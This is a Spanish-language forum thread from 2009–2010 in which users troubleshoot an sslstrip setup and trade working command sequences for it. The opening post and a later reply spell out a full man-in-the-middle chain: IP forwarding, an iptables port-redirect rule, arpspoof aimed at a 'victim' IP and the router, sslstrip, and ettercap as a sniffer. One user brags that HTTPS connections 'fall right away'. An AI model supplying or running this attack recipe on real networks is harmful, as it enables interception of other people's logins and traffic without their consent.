Problemas Sslstrip

Iniciado por gerard_88, 1 Noviembre 2009, 21:11 PM

0 Miembros y 1 Visitante están viendo este tema.

gerard_88

Hola compañeros, estoy haciendo mis pinitos con el sslstrip, hago los siguientes pasos:

Shell 1:
cd '/home/anonimous/Escritorio/sslstrip-0.4'
python setup.py build
python setup.py install

Shell 2:
arpspoof -i wlan0 -t 192.168.1.33 192.168.1.1

Shell 3:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l 1000

Shell 4:
sudo ettercap -Tqz -i wlan0

La primera vez que lo probe me funciono, pero despues me devuelve este error, y no entiendo su significado.

Traceback (most recent call last):
 File "/usr/local/bin/sslstrip", line 256, in <module>
   main(sys.argv[1:])
 File "/usr/local/bin/sslstrip", line 246, in main
   server = ThreadingHTTPServer(('', int(listenPort)), StripProxy)
 File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
   self.server_bind()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 108, in server_bind
   SocketServer.TCPServer.server_bind(self)
 File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
   self.socket.bind(self.server_address)
 File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use


Haber si alguien me puede ayudar.
Gracias de antemano.


kamsky

Citarsocket.error: [Errno 98] Address already in use

Ya hay un socket abierto y escuchando en el puerto donde intentas crear el nuevo, mata antes el proceso del que depende el socket, para saber cual es:

# netstat -aveptn
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

ChElAnO

o corre sslstrip en otro puerto (y tambien debes cambiar la regla de iptables para que redireccione a ese otro puerto=

saludos

cliso

saludos, te pego el codigo con el que yo funciono y he auditado mi red, a mi me funciona de maravilla

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
nmap 192.168.1.1-254

..... en otra shell .....

arpspoof -i [interfaz] -t [ip victima] [ip router]

..... en otra shell......

python sslstrip.py -l 10000

.... en otra shell....

ettercap -T -q -i [interfaz]


espero haberte ayudado y si te ha ido bien, comenta


saludos

el sabio tiene miedo, el ignorante valor

PyrOS-9889

El segundo problema que veo con el sslstrip. alguien me puede explicar porque usan ettercap con arpspoof????

porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!

tragantras

para hacer un mitm :) o sino como te va a enviar la victima los dateles? xD
Colaboraciones:
1 2

PyrOS-9889

Cita de: tragantras en 26 Septiembre 2010, 21:36 PM
para hacer un mitm :) o sino como te va a enviar la victima los dateles? xD

mmmm..... pues mira que usando solo el arpspoof haces el MitM  :silbar:

o usando solo el ettercap haces tambien el MitM por eso digo que no veo la necesidad de mezclarlos...

o hay algo mas detrás??? explícame que esa es mi duda...

tragantras

a vale vale, no entendí tu pregunta


sudo ettercap -Tqz -i wlan0

-T -> modo texto, no interfaz grafica

-q -> quiet, no hace print de los paquetes capturados

-z -> no hace el arp scan buscando hosts

-i wlan0 -> interfaz wlan0

es decir, el ettercap se utilizará como sniffer... no se hace el arp spoof mediante él

http://linux.die.net/man/8/ettercap
Colaboraciones:
1 2

PyrOS-9889

ok... ya entiendo el uso del ettercap en este post... pero bueno aun así no veo la necesidad de usar el ettercap.

Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida  :laugh:

tragantras

claro, porque tu usarás otro sniffer, como el wireshark o algo así!
Colaboraciones:
1 2